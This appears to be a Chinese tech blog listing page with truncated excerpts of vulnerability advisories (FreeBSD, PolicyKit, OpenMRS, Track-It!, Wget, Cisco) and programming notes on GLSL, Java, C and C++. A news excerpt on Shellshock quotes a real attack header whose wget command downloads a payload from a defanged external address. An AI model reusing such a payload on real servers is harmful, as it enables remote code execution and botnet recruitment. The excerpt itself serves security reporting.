FreeBSD routed拒绝服务漏洞（CVE-2014-3955）

2017年02月05日 11 阅读

发布日期：2014-10-23更新日期：2014-10-25受影响系统：FreeBSD FreeBSD 9.3FreeBSD FreeBSD 9.2FreeBSD FreeBSD 9.1描述：CVE（CAN） ID: CVE-2014-3955FreeBSD是一种UNIX操作系统，是由经过BSD、386BSD和4.4BSD发展而来的Unix的一个重要分支。FreeBSD 9.1, 9.2, 9.3版本在处理某些RIP请求时，routed后台程序存在错误，攻...

OpenGL超级宝典学习笔记——GLSL语言基础

2017年02月05日 11 阅读

变量GLSL的变量命名方式与C语言类似。变量的名称可以使用字母，数字以及下划线，但变量名不能以数字开头，还有变量名不能以gl_作为前缀，这个是GLSL保留的前缀，用于GLSL的内部变量。当然还有一些GLSL保留的名称是不能够作为变量的名称的。基本类型除了布尔型，整型，浮点型基本类型外，GLSL还引入了一些在着色器中经常用到的类型作为基本类型。这些基本类型都可以作为结构体内部的类型。如下表:类型描述void跟C语言的void类似，表示空类型。作为函数的返回类...

FreeBSD rtsold “dname_labeldec（）”缓冲区溢出漏洞（CVE-2014-3954）

2017年02月05日 11 阅读

发布日期：2014-10-23更新日期：2014-10-25受影响系统：FreeBSD FreeBSD 9.3FreeBSD FreeBSD 9.2FreeBSD FreeBSD 9.1描述：CVE（CAN） ID: CVE-2014-3954FreeBSD是一种UNIX操作系统，是由经过BSD、386BSD和4.4BSD发展而来的Unix的一个重要分支。FreeBSD 9.1, 9.2, 9.3版本在处理路由通告报文时，"dname_labeldec（）...

Linux PolicyKit竞争条件权限提升漏洞

2017年02月05日 11 阅读

发布日期：2014-10-21更新日期：2014-10-26受影响系统：PolicyKit PolicyKit描述：CVE（CAN） ID: CVE-2011-1485Policykit是管理策略和权限的框架。PolicyKit （polkit） 0.96版本在pkexec及polkitd程序的实现上存在竞争条件，本地用户利用此漏洞可获取提升的权限。<*来源：Neel Mehta *>建议：厂商补丁：PolicyKit---------目前厂商...

OpenGL超级宝典学习笔记——顶点着色器示例

2017年02月05日 11 阅读

以下内容只针对GLSL1.20的版本进行说明的，有些内置的变量在1.20之后，已经被废弃了。初次实验每个顶点着色器都至少输出一个裁剪空间的位置坐标。光照、纹理坐标的生成和其他的一些操作是可选的。例如，你要创建了深度纹理，那你只需要最终的深度值，你就没必要在着色器中处理颜色和纹理坐标，也不需要输出它们。但至少需要输出裁剪空间的坐标给后面的图元组装和光栅化。如果不输出任何东西，行为将是未定义的。如果要让颜色在后面的管道中可见，则至少要把输入的颜色拷贝到输出颜色...

OpenMRS 多个安全漏洞

2017年02月05日 11 阅读

发布日期：2014-10-21更新日期：2014-10-26受影响系统：OpenMRS OpenMRS描述：BUGTRAQ ID: 70664CVE（CAN） ID: CVE-2014-8071,CVE-2014-8072,CVE-2014-8073OpenMRS是开源的电子医疗记录系统。OpenMRS 2.1版本在实现上存在多个HTML注入漏洞、跨站脚本漏洞、跨站请求伪造漏洞、访问绕过漏洞，成功利用后绕过某些安全限制、获取敏感信息、在受影响用户浏览器中执...

OpenGL超级宝典学习笔记——片段着色器（二）

2017年02月05日 11 阅读

图像处理图像处理是一种独立于顶点着色器的特殊处理程序。在不使用片段着色器的情况下绘制场景之后，可以按照各种方式应用卷积核。为了保持着色器的简洁，使用硬件加速，我们限制总卷积的大小为3X3.在示例程序中，调用glCopyTexIamge2D把帧缓冲区拷贝到纹理中。纹理的大下为小于窗口的2的最大N次方值（在2.0中则没有这个限制）。然后在窗口的中间绘制一个片段着色的四边形，大小与这个纹理相同，其纹理坐标从左下角（0，0）到右上角（1，1）。片段着色器基于纹理坐...

Numara/BMC Track-It！ /TrackItWeb/Attachment页任意文件下载漏洞

2017年02月05日 11 阅读

发布日期：2014-10-21更新日期：2014-10-26受影响系统：BMC Track-It！ 11.3.0.355描述：CVE（CAN） ID: CVE-2014-4874BMC Track-It！是集成的IT帮助桌面和资产管理解决方案。BMC Track-It！ 11.3.0.355版本/TrackItWeb/Attachment页在实现上存在任意文件下载漏洞，经过身份验证的远程用户利用此漏洞可下载任意文件。<*来源：Pedro Ribeir...

Python pickle模块的简单使用笔记

2017年02月05日 11 阅读

Python pickle 模块提供了把对象序列化的方法，对象会被序列化成ASCII的字符串，可以保存到文件。unpickle则可以从文件或字符中反序列化成对象。如下的两个方法非常有用。pickle.dumps（obj[, protocol]）Return the pickled representation of the object as a string, instead of writing it to a file.If the protocol...

Interior Design For Android SSL证书验证安全绕过漏洞

2017年02月05日 11 阅读

发布日期：2014-10-21更新日期：2014-10-22受影响系统：Interior Design For Android Interior Design For Android描述：BUGTRAQ ID: 70674CVE（CAN） ID: CVE-2014-7618Interior Design for Android室内设计Android应用程序。Interior Design 1.0及其他版本没有正确验证SSL服务器的X.509证书，在实现上存...

简述Java内存模型的由来、概念及语义

2017年02月05日 11 阅读

JDK5引入了JMM新规范：JSR-133，引入了happens-before/可见性等概念，对synchronized/volatile/final等关键词进行了语义定义。解决了：final变量在构造器中初始化的线程安全问题以及volatile变量与no-volatile变量之间的重排序问题。为什么需要Memory Model在多线程的场景下，thread1修改了一个变量后，thread2要读取这个变量，其间可能会发生指令执行顺序的问题（因为编译器优化指...

攻击者利用Shellshock漏洞入侵邮件服务器

2017年02月05日 11 阅读

攻击者正利用上个月披露的Shellshock漏洞入侵邮件服务器建立僵尸网络。Shellshock漏洞是指攻击者向使用bash的Unix/Linux服务器发送精心构造的请求，诱骗bash远程执行命令。安全研究人员报告，攻击者向邮件服务器发送特定的消息头字段，诱骗服务器执行一个 Perl脚本，成为僵尸网络的一部分。邮件消息头的构成是： Message-ID:（） { :; };wget -O /tmp/.legend hxxp://190-94-251-41/...

C语言计算日期间隔天数的经典算法解析

2017年02月05日 11 阅读

在网上看到了一个C语言计算日期间隔的方法，咋一看很高深，仔细看更高神，很巧妙。先直接代码吧#include <stdio.h>#include <stdlib.h>int day_diff（int year_start, int month_start, int day_start , int year_end, int month_end, int day_end）{int y2, m2, d2;int y1, m1, d1;m1...

Numara/BMC Track-It！ SQL注入漏洞

2017年02月05日 11 阅读

发布日期：2014-10-21更新日期：2014-10-28受影响系统：BMC Track-It！ 11.3.0.355描述：CVE（CAN） ID: CVE-2014-4873BMC Track-It！是集成的IT帮助桌面和资产管理解决方案。BMC Track-It！ 11.3.0.355版本TrackItWeb/Grid/GetData在实现上存在SQL注入漏洞，经过身份验证的远程用户通过构造的POST数据，利用此漏洞可执行任意SQL命令。<*来...

Linux C ftruncate 函数清空文件注意事项（要使用 lseek 重置偏移量）

2017年02月05日 11 阅读

之前有个要把打开的文件清空，然后重新写入的需求，但是使用 ftruncate（fd, 0）后，并没有达到效果，反而文件头部有了""，长度比预想的大了。究其原因是没有使用 lseek 重置文件偏移量，是我太天真了，以为清空文件就会从头开始写入。------------------------------------- 我是解释分割线 --------------------------------------首先 man ftruncate 看下帮助手册NA...

Dell EqualLogic目录遍历漏洞（CVE-2013-3304）

2017年02月05日 11 阅读

发布日期：2014-10-25更新日期：2014-10-29受影响系统：Dell EqualLogic描述：BUGTRAQ ID: 70760CVE（CAN） ID: CVE-2013-3304Dell EqualLogicis是基于iSCSI的存储网络系统产品。Dell EqualLogic 固件版本6.0及其他版本在实现上存在目录遍历漏洞，成功利用后可使攻击者访问任意系统文件。<*来源：Mauricio Correa*>测试方法：警 告以下...

C++拾遗--虚函数原理

2017年02月05日 11 阅读

前言C++的多态依赖虚函数来实现。若类存在虚函数，则每一个类的实例都维护了一个地址，这个地址指向虚函数表。虚函数表中存放的是类中所有虚函数的地址。下面我们找出虚函数表的地址，从而获得每个虚函数的地址，然后使用地址直接调用虚函数。正文1.空类的size#include <iostream>using namespace std;class MyClass{};int main（）{cout << "sizeof（MyClass） = ...

GNU Wget符号链接漏洞（CVE-2014-4877）

2017年02月05日 12 阅读

发布日期：2014-10-27更新日期：2014-10-29受影响系统：GNU wget描述：BUGTRAQ ID: 70751CVE（CAN） ID: CVE-2014-4877GNU Wget是一个免费的软件包，用于使用HTTP、HTTPS和FTP协议检索文件。GNU Wget在实现上存在符号链接漏洞，攻击者可利用此漏洞访问受限制目录以外的文件，获取敏感信息，执行其他攻击。Linux wget命令详解 http://www.linuxidc.com/L...

C++拾遗--引用（左值引用、右值引用）

2017年02月05日 11 阅读

前言引用就是别名（alias）。所谓别名，就是对已存在的对象另起一个名字。本身含义并不难理解，但与其它概念一组合，就成了使用难点。再加上新标准提出了新的一种引用-右值引用，引用这一概念就变得更加难以理解和使用。正文随着新标准（新标准往往就是新的技术）的提出，引用这一概念分成两类：左值引用、右值引用。其中左值引用是最常用的一种，而右值引用则是语言使用上的一种革新。1.左值引用左值引用的基本语法Type &引用名 = 左值表达式;#include &l...

Cisco ASR 901 Series Routers拒绝服务漏洞（CVE-2014-3293）

2017年02月05日 11 阅读

发布日期：2014-10-27更新日期：2014-10-29受影响系统：Cisco ASR 901描述：BUGTRAQ ID: 70744CVE（CAN） ID: CVE-2014-3293Cisco ASR 901 Series Routers是聚合服务路由器。Cisco ASR901在畸形IPv4数据包处理的实现上存在拒绝服务漏洞，未经身份验证的远程攻击者可利用此漏洞耗尽ASR901 CPU资源，造成拒绝服务。<*来源：Cisco*>建议：...